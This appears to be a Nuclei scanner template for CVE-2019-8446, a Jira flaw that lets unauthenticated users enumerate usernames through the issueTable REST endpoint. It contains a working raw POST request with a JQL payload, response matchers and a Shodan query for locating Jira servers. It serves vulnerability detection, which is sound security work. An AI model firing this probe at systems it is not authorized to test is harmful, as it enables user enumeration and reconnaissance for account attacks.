nuclei-templates/http/cves/2019/CVE-2019-8446.yaml

56 lines
2.0 KiB
YAML

id: CVE-2019-8446
info:
name: Jira Improper Authorization
author: dhiyaneshDk
severity: medium
description: The /rest/issueNav/1/issueTable resource in Jira before version 8.3.2 allows remote attackers to enumerate usernames via an incorrect authorisation check.
impact: |
This vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Jira application.
remediation: |
Apply the latest security patches and updates provided by Atlassian to fix the vulnerability.
reference:
- https://jira.atlassian.com/browse/JRASERVER-69777
- https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839
- https://github.com/ARPSyndicate/kenzer-templates
- https://github.com/CyberTrashPanda/CVE-2019-8446
- https://github.com/Elsfa7-110/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2019-8446
cwe-id: CWE-863
epss-score: 0.15691
epss-percentile: 0.95793
cpe: cpe:2.3:a:atlassian:jira_server:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: atlassian
product: jira_server
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2019,jira,atlassian
http:
- raw:
- |
POST /rest/issueNav/1/issueTable HTTP/1.1
Host: {{Hostname}}
Connection: Close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
X-Atlassian-Token: no-check
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
{'jql':'project in projectsLeadByUser("{{randstr}}")'}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "the user does not exist"
- type: status
status:
- 200
# digest: 490a0046304402204193059c6d37e2bcfcee79be9ac734f32f43ad99d44a03f3b04086fe98ecc423022055242cae42df9b1b7cddd32cf8e362c3b7cd83e6c86b6caafa6bdd2419afe187:922c64590222798bb761d5b6d8e72950